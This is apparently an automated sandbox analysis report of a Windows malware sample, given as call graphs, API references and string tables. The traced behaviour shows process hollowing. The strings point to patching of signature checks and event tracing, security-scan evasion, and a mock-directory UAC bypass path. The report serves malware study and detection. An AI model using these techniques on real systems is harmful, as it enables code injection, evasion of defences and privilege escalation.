38284 40cca7e 38283->38284 38285 40cca8f 38283->38285 38286 40747dc 8 API calls 38284->38286 38287 40747dc 8 API calls 38285->38287 38288 40cca8d 38286->38288 38287->38288 38289 4074b0c 8 API calls 38288->38289 38290 40ccabc 38289->38290 40054 4074c4c 38290->40054 38293 40ccace 38294 40ccae7 38293->38294 38295 40ccaef 38294->38295 38296 40ccaf9 38295->38296 40056 408fd38 38296->40056 38299 4074b0c 8 API calls 38300 40ccb20 38299->38300 38301 4074c4c 38300->38301 38302 40ccb28 38301->38302 40065 4074980 38302->40065 40055 4074c50 40054->40055 40055->38293 40057 408fd4c 40056->40057 40058 408fd90 GetProcAddress 40057->40058 40059 408fdb8 40058->40059 40060 408fdd2 GetCurrentProcess 40059->40060 40061 408fb78 40060->40061 40062 408fdee FreeLibrary 40061->40062 40067 40747ac 40062->40067 40066 4074986 40065->40066 40069 40747b2 40067->40069 40068 40747d8 40068->38299 40069->40068 40070 4072cc8 8 API calls 40069->40070 40070->40069 40071 4071b2b 40072 4071b3d 40071->40072 40073 4071c08 40071->40073 40075 4071b43 40072->40075 40077 4071baf Sleep 40072->40077 40074 4071784 40073->40074 40073->40075 40076 4071d02 40074->40076 40079 40716e0 2 API calls 40074->40079 40078 4071b4c 40075->40078 40081 4071be7 Sleep 40075->40081 40085 4071c1d 40075->40085 40077->40075 40080 4071bc9 Sleep 40077->40080 40082 4071791 VirtualFree 40079->40082 40080->40072 40083 4071bfd Sleep 40081->40083 40081->40085 40084 40717a9 40082->40084 40083->40075 40086 4071c9c VirtualFree 40085->40086 40087 4071c40 40085->40087 40088 40d9740 40096 40768b8 40088->40096 40092 40d976e 40093 40d9786 GetMessageA 40092->40093 40094 40d977a TranslateMessage DispatchMessageA 40093->40094 40095 40d9796 40093->40095 40094->40093 40097 40768c3 40096->40097 40101 4074444 40097->40101 40100 4074558 SysFreeString 40100->40092 40102 407448a 40101->40102 40103 4074694 40102->40103 40104 4074503 40102->40104 40106 40746c5 40103->40106 40110 40746d6 40103->40110 40115 40743dc 40104->40115 40121 4074608 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 40106->40121 40109 40746cf 40109->40110 40111 407471b FreeLibrary 40110->40111 40112 407473f 40110->40112 40111->40110 40113 407474e ExitProcess 40112->40113 40114 4074748 40112->40114 40114->40113 40116 407441f 40115->40116 40117 40743ec 40115->40117 40116->40100 40117->40116 40120 4071668 VirtualAlloc 40117->40120 40122 40d95f8 40117->40122 40136 4075b78 40117->40136 40120->40117 40121->40109 40123 40d9670 40122->40123 40124 40d9612 GetVersion 40122->40124 40123->40117 40140 40b7420 GetCurrentProcessId 40124->40140 40128 40d9636 40172 4087200 34 API calls 40128->40172 40130 40d9640 40173 40871ac 34 API calls 40130->40173 40132 40d9650 40174 40871ac 34 API calls 40132->40174 40134 40d9660 40175 40871ac 34 API calls 40134->40175 40137 4075ba4 40136->40137 40138 4075b88 GetModuleFileNameA 40136->40138 40137->40117 40325 4075ddc GetModuleFileNameA RegOpenKeyExA 40138->40325 40176 40796ec 40140->40176 40143 40747dc 8 API calls 40144 40b7469 40143->40144 40145 40b7479 GetCurrentThreadId 40144->40145 40146 40796ec 32 API calls 40145->40146 40147 40b74ad 40146->40147 40148 40747dc 8 API calls 40147->40148 40149 40b74ba 40148->40149 40150 40b74c4 GlobalAddAtomA 40149->40150 40151 4074c4c 40150->40151 40152 40b74da RegisterClipboardFormatA 40151->40152 40179 4087b44 40152->40179 40154 40b74f1 40183 40b7028 40154->40183 40156 40b74fb 40191 40b6dd4 40156->40191 40158 40b7507 40195 40c1538 40158->40195 40160 40b751a 40210 40c2740 40160->40210 40162 40b7530 40227 40872ec 34 API calls 40162->40227 40164 40b755a GetModuleHandleA 40165 40b757a 40164->40165 40166 40b756a GetProcAddress 40164->40166 40167 4074788 8 API calls 40165->40167 40166->40165 40168 40b758f 40167->40168 40169 4074788 8 API calls 40168->40169 40170 40b7597 40169->40170 40171 4087160 34 API calls 40170->40171 40171->40128 40172->40130 40173->40132 40174->40134 40175->40123 40228 4079700 40176->40228 40180 4087b4a 40179->40180 40181 4087b5f RtlInitializeCriticalSection 40180->40181 40182 4087b74 40181->40182 40182->40154 40184 40b703c SetErrorMode 40183->40184 40185 40b7195 40183->40185 40186 40b707c 40184->40186 40187 40b7060 GetModuleHandleA GetProcAddress 40184->40187 40185->40156 40188 40b7089 LoadLibraryA 40186->40188 40189 40b7177 SetErrorMode 40186->40189 40187->40186 40188->40189 40190 40b70a5 10 API calls 40188->40190 40189->40156 40190->40189 40192 40b6dda 40191->40192 40243 40b6fc4 40192->40243 40194 40b6e48 40194->40158 40196 40c1542 40195->40196 40256 408d8bc 40196->40256 40198 40c1558 40260 40c18f4 LoadCursorA 40198->40260 40201 40c1591 40265 4091fe4 40201->40265 40203 40c160f 40204 4091fe4 10 API calls 40203->40204 40205 40c1621 40204->40205 40206 4091fe4 10 API calls 40205->40206 40207 40c1633 40206->40207 40269 40c1d24 40207->40269 40209 40c1640 40209->40160 40211 40c274f 40210->40211 40212 408d8bc 32 API calls 40211->40212 40213 40c2765 40212->40213 40214 40c2822 LoadIconA 40213->40214 40307 4097524 40214->40307 40216 40c2845 GetModuleFileNameA OemToCharA 40217 40c288e 40216->40217 40218 40c28b4 CharNextA CharLowerA 40217->40218 40219 40c28dc 40218->40219 40309 408ea38 GetClassInfoA 40219->40309 40222 40c28fe 40318 40c2a94 45 API calls 40222->40318 40223 40c2905 40319 40c4b14 8 API calls 40223->40319 40226 40c2927 40226->40162 40227->40164 40229 4079726 40228->40229 40231 4079759 40229->40231 40241 40792f4 32 API calls 40229->40241 40232 40797c3 40231->40232 40239 4079776 40231->40239 40233 4074878 8 API calls 40232->40233 40235 40796fb 40233->40235 40234 40797b7 40236 4074ed4 8 API calls 40234->40236 40235->40143 40236->40235 40237 4074788 8 API calls 40237->40239 40238 4074ed4 8 API calls 40238->40239 40239->40234 40239->40237 40239->40238 40242 40792f4 32 API calls 40239->40242 40241->40231 40242->40239 40244 40b6fd3 40243->40244 40245 40b6fcc 40243->40245 40246 40b6fe9 40244->40246 40247 40b6fe0 40244->40247 40248 40b700f SendMessageA 40245->40248 40249 40b6ffe SystemParametersInfoA 40245->40249 40252 40b6fd1 40245->40252 40255 40b6f24 SystemParametersInfoA 40246->40255 40254 40b6f54 RegisterClipboardFormatA RegisterClipboardFormatA SendMessageA SendMessageA 40247->40254 40248->40252 40249->40252 40252->40194 40253 40b6ff0 40253->40194 40254->40252 40255->40253 40257 408d8c3 40256->40257 40258 408d8e8 40257->40258 40287 408da78 32 API calls 40257->40287 40258->40198 40261 40c1913 40260->40261 40262 40c192c LoadCursorA 40261->40262 40264 40c157b GetKeyboardLayout 40261->40264 40288 40c19b0 40262->40288 40264->40201 40266 4091fea 40265->40266 40291 40914f0 40266->40291 40268 409200c 40268->40203 40270 40c1d3d 40269->40270 40271 40c1d6f SystemParametersInfoA 40270->40271 40272 40c1d82 CreateFontIndirectA 40271->40272 40274 40c1d9a 40271->40274 40301 4092434 13 API calls 40272->40301 40302 4092434 13 API calls 40274->40302 40275 40c1d98 40276 40c1dae SystemParametersInfoA 40275->40276 40278 40c1dce CreateFontIndirectA 40276->40278 40279 40c1e02 40276->40279 40303 4092434 13 API calls 40278->40303 40305 4092518 13 API calls 40279->40305 40282 40c1e12 GetStockObject 40306 4092434 13 API calls 40282->40306 40283 40c1de7 CreateFontIndirectA 40304 4092434 13 API calls 40283->40304 40286 40c1e00 40286->40209 40287->40258 40289 4072cac 8 API calls 40288->40289 40290 40c19c3 40289->40290 40290->40261 40292 409150b 40291->40292 40299 40914d8 RtlEnterCriticalSection 40292->40299 40295 4091515 40296 4072cac 8 API calls 40295->40296 40298 4091572 40295->40298 40296->40298 40297 40915c3 40297->40268 40300 40914e4 RtlLeaveCriticalSection 40298->40300 40299->40295 40300->40297 40301->40275 40302->40276 40303->40283 40304->40286 40305->40282 40306->40286 40308 4097530 40307->40308 40308->40216 40310 408ea68 40309->40310 40311 408ea91 40310->40311 40312 408ea76 UnregisterClassA 40310->40312 40313 408ea87 RegisterClassA 40310->40313 40320 407738c 40311->40320 40312->40313 40313->40311 40315 408eabf 40316 408eadc 40315->40316 40317 408ead3 SetWindowLongA 40315->40317 40316->40222 40316->40223 40317->40316 40318->40223 40319->40226 40324 4072ffc 40320->40324 40322 407739f CreateWindowExA 40323 40773d9 40322->40323 40323->40315 40324->40322 40326 4075e5f 40325->40326 40327 4075e1f RegOpenKeyExA 40325->40327 40343 4075c18 6 API calls 40326->40343 40327->40326 40328 4075e3d RegOpenKeyExA 40327->40328 40328->40326 40330 4075ee8 lstrcpyn GetThreadLocale GetLocaleInfoA 40328->40330 40332 4076002 40330->40332 40333 4075f1f 40330->40333 40331 4075e84 RegQueryValueExA 40334 4075ec6 RegCloseKey 40331->40334 40335 4075ea4 RegQueryValueExA 40331->40335 40332->40137 40333->40332 40336 4075f2f lstrlen 40333->40336 40334->40137 40335->40334 40337 4075ec2 40335->40337 40338 4075f47 40336->40338 40337->40334 40338->40332 40339 4075f94 40338->40339 40340 4075f6c lstrcpyn LoadLibraryExA 40338->40340 40339->40332 40341 4075f9e lstrcpyn LoadLibraryExA 40339->40341 40340->40339 40341->40332 40342 4075fd0 lstrcpyn LoadLibraryExA 40341->40342 40342->40332 40343->40331
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$FileName$CloseName_$AddressAttributesCurrentFreeLibraryModuleProcProcessWrite
                                                                                                    • String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\System32\\easinvoker.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
                                                                                                    • API String ID: 976750054-2902499223
                                                                                                    • Opcode ID: ab06cb46ffd0881636d075fe75f28f48d717e41b4904d81b67c4362b9e6f9e51
                                                                                                    • Instruction ID: 5934cbad34d258c67726973178874b168fcf7050f05cccc7daec8ba71c9fb858
                                                                                                    • Opcode Fuzzy Hash: ab06cb46ffd0881636d075fe75f28f48d717e41b4904d81b67c4362b9e6f9e51
                                                                                                    • Instruction Fuzzy Hash: 71F3ED35B012199BE750EB68DD80BDEB3F9AF8530CF5081A6E109BB614DB34BE858F45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 4215 4097e4c-4097e4f 4216 4097e54-4097e59 4215->4216 4216->4216 4217 4097e5b-4097ee9 call 4074c3c call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 4216->4217 4234 40996ad-40996f5 call 40747ac * 2 call 4074f68 call 40747ac 4217->4234 4235 4097eef-4097fca call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 4217->4235 4235->4234 4272 4097fd0-40982e0 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 407320c * 2 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 40750e8 call 40750f8 call 4076a24 4235->4272 4381 4098353-40985d5 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4072f9c call 4072fc4 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 GetThreadContext 4272->4381 4382 40982e2-409834e call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 4272->4382 4381->4234 4470 40985db-409883e call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 NtReadVirtualMemory 4381->4470 4382->4381 4541 4098b4b-4098bb7 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 4470->4541 4542 4098844-40989ad call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 NtUnmapViewOfSection 4470->4542 4569 4098bbc-4098ccb call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 408fb80 4541->4569 4627 40989af-40989cb call 408fb80 4542->4627 4628 40989d7-4098a43 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 4542->4628 4569->4234 4633 4098cd1-4098dca call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4097d5c 4569->4633 4634 40989d0-40989d5 4627->4634 4637 4098a48-4098b3f call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 408fb80 4628->4637 4707 4098dcc-4098e19 call 4097c54 call 407737c 4633->4707 4708 4098e1e-40996a8 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 NtWriteVirtualMemory call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 NtWriteVirtualMemory call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 SetThreadContext NtResumeThread call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4072cc8 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 408fcd8 * 3 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 408fcd8 * 4 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 call 4074b0c call 4074c4c call 4074980 call 4074a98 call 4074c4c call 4074980 call 408fd38 4633->4708 4634->4637 4709 4098b44-4098b49 4637->4709 4707->4708 4708->4234 4709->4569
                                                                                                    APIs
                                                                                                      • Part of subcall function 0408FD38: GetProcAddress.KERNEL32(0410A358,00000000), ref: 0408FD97
                                                                                                      • Part of subcall function 0408FD38: GetCurrentProcess.KERNEL32(0410A35C,Function_00005ADC,00000004,0410A360,00000000,0410A35C,17D783FC,00000040,0410A360,0410A358,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0408FDE3
                                                                                                      • Part of subcall function 0408FD38: FreeLibrary.KERNEL32(0410A358,00000000,0410A35C,Function_00005ADC,00000004,0410A360,00000000,0410A35C,17D783FC,00000040,0410A360,0410A358,00000000,00000000,00000000,00000000), ref: 0408FDF4
                                                                                                    • GetThreadContext.KERNEL32(0410A3FC,0410A44C,ScanString,0410A3D0,04099710,UacInitialize,0410A3D0,04099710,ScanBuffer,0410A3D0,04099710,ScanBuffer,0410A3D0,04099710,OpenSession,0410A3D0), ref: 040985CE
                                                                                                    • NtReadVirtualMemory.NTDLL(0410A3F8,0410A4E8,0410A520,00000004,0410A528), ref: 0409882B
                                                                                                    • NtUnmapViewOfSection.NTDLL(0410A3F8,0409AF38), ref: 040989A6
                                                                                                      • Part of subcall function 0408FB80: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0408FB8D
                                                                                                      • Part of subcall function 0408FB80: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0408FB93
                                                                                                      • Part of subcall function 0408FB80: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0408FBB3
                                                                                                    • NtWriteVirtualMemory.NTDLL(0410A3F8,0410A524,00000000,0410A534,0410A528), ref: 04098F89
                                                                                                    • NtWriteVirtualMemory.NTDLL(0410A3F8,0410A4E8,0410A524,00000004,0410A528), ref: 040990FC
                                                                                                    • SetThreadContext.KERNEL32(0410A3FC,0410A44C,ScanBuffer,0410A3D0,04099710,ScanString,0410A3D0,04099710,Initialize,0410A3D0,04099710,0410A3F8,0410A4E8,0410A524,00000004,0410A528), ref: 04099272
                                                                                                    • NtResumeThread.NTDLL(0410A3FC,00000000), ref: 0409927F
                                                                                                      • Part of subcall function 0408FCD8: LoadLibraryW.KERNEL32 ref: 0408FCEA
                                                                                                      • Part of subcall function 0408FCD8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0408FCF7
                                                                                                      • Part of subcall function 0408FCD8: NtWriteVirtualMemory.NTDLL(0410A3F8,00000000,?,00000001,?), ref: 0408FD0E
                                                                                                      • Part of subcall function 0408FCD8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,04099710,ScanString,0410A3D0,04099710,Initialize,0410A3D0,04099710,UacScan,0410A3D0,04099710,UacInitialize,0410A3D0), ref: 0408FD1D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextFree$AllocateCurrentHandleLoadModuleProcessReadResumeSectionUnmapView
                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
                                                                                                    • API String ID: 98964713-1058128293
                                                                                                    • Opcode ID: 2cb86fd318f461169483d83dfe0e8ff24ebb50e3b742416b0938fdfc9cf65b3d
                                                                                                    • Instruction ID: f30675290080b816b3ef5052e9edcabb3325e6c559e27e4106f642a794744e8d
                                                                                                    • Opcode Fuzzy Hash: 2cb86fd318f461169483d83dfe0e8ff24ebb50e3b742416b0938fdfc9cf65b3d
                                                                                                    • Instruction Fuzzy Hash: 74D21871A001199BEB51EB64DD90FCEB7B9AF55208F1081A5E104BB324DF30FE869F5A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 4966 4075ddc-4075e1d GetModuleFileNameA RegOpenKeyExA 4967 4075e5f-4075ea2 call 4075c18 RegQueryValueExA 4966->4967 4968 4075e1f-4075e3b RegOpenKeyExA 4966->4968 4975 4075ec6-4075ee0 RegCloseKey 4967->4975 4976 4075ea4-4075ec0 RegQueryValueExA 4967->4976 4968->4967 4969 4075e3d-4075e59 RegOpenKeyExA 4968->4969 4969->4967 4971 4075ee8-4075f19 lstrcpyn GetThreadLocale GetLocaleInfoA 4969->4971 4973 4076002-4076009 4971->4973 4974 4075f1f-4075f23 4971->4974 4977 4075f25-4075f29 4974->4977 4978 4075f2f-4075f45 lstrlen 4974->4978 4976->4975 4979 4075ec2 4976->4979 4977->4973 4977->4978 4980 4075f48-4075f4b 4978->4980 4979->4975 4981 4075f57-4075f5f 4980->4981 4982 4075f4d-4075f55 4980->4982 4981->4973 4984 4075f65-4075f6a 4981->4984 4982->4981 4983 4075f47 4982->4983 4983->4980 4985 4075f94-4075f96 4984->4985 4986 4075f6c-4075f92 lstrcpyn LoadLibraryExA 4984->4986 4985->4973 4987 4075f98-4075f9c 4985->4987 4986->4985 4987->4973 4988 4075f9e-4075fce lstrcpyn LoadLibraryExA 4987->4988 4988->4973 4989 4075fd0-4076000 lstrcpyn LoadLibraryExA 4988->4989 4989->4973
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 04075DF8
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04075E16
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04075E34
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 04075E52
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,04075EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 04075E9B
                                                                                                    • RegQueryValueExA.ADVAPI32(?,04076048,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,04075EE1,?,80000001), ref: 04075EB9
                                                                                                    • RegCloseKey.ADVAPI32(?,04075EE8,00000000,00000000,00000005,00000000,04075EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04075EDB
                                                                                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 04075EF8
                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 04075F05
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 04075F0B
                                                                                                    • lstrlen.KERNEL32(00000000), ref: 04075F36
                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 04075F7D
                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04075F8D
                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 04075FB5
                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04075FC5
                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04075FEB
                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04075FFB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                    • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                    • API String ID: 1759228003-3917250287
                                                                                                    • Opcode ID: 069c3e6c0c03358446caf4a23cad722280735d3025ff282beae69c54c2b59b9b
                                                                                                    • Instruction ID: 7ae3cda3732a7f6a961c8b41d506283398491cc6730758fc3bed830f3e6b9c72
                                                                                                    • Opcode Fuzzy Hash: 069c3e6c0c03358446caf4a23cad722280735d3025ff282beae69c54c2b59b9b
                                                                                                    • Instruction Fuzzy Hash: 86518675E0024C7EFB25DAA4CC46FEF77EC9B04748F4004A1A705FA1C1E674BA558BA6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5071 408fcd8-408fcf3 LoadLibraryW 5072 408fd22-408fd2a 5071->5072 5073 408fcf5-408fcfe GetProcAddress 5071->5073 5074 408fd1c-408fd1d FreeLibrary 5073->5074 5075 408fd00-408fd18 NtWriteVirtualMemory 5073->5075 5074->5072 5075->5074 5076 408fd1a 5075->5076 5076->5074
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32 ref: 0408FCEA
                                                                                                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0408FCF7
                                                                                                    • NtWriteVirtualMemory.NTDLL(0410A3F8,00000000,?,00000001,?), ref: 0408FD0E
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,04099710,ScanString,0410A3D0,04099710,Initialize,0410A3D0,04099710,UacScan,0410A3D0,04099710,UacInitialize,0410A3D0), ref: 0408FD1D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                    • String ID: BCryptVerifySignature$bcrypt
                                                                                                    • API String ID: 1002360270-4067648912
                                                                                                    • Opcode ID: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
                                                                                                    • Instruction ID: 5c02ce4393725b3ae847a97d39395897fd55f8c03bd9d7c2346c93cd78c2f3ac
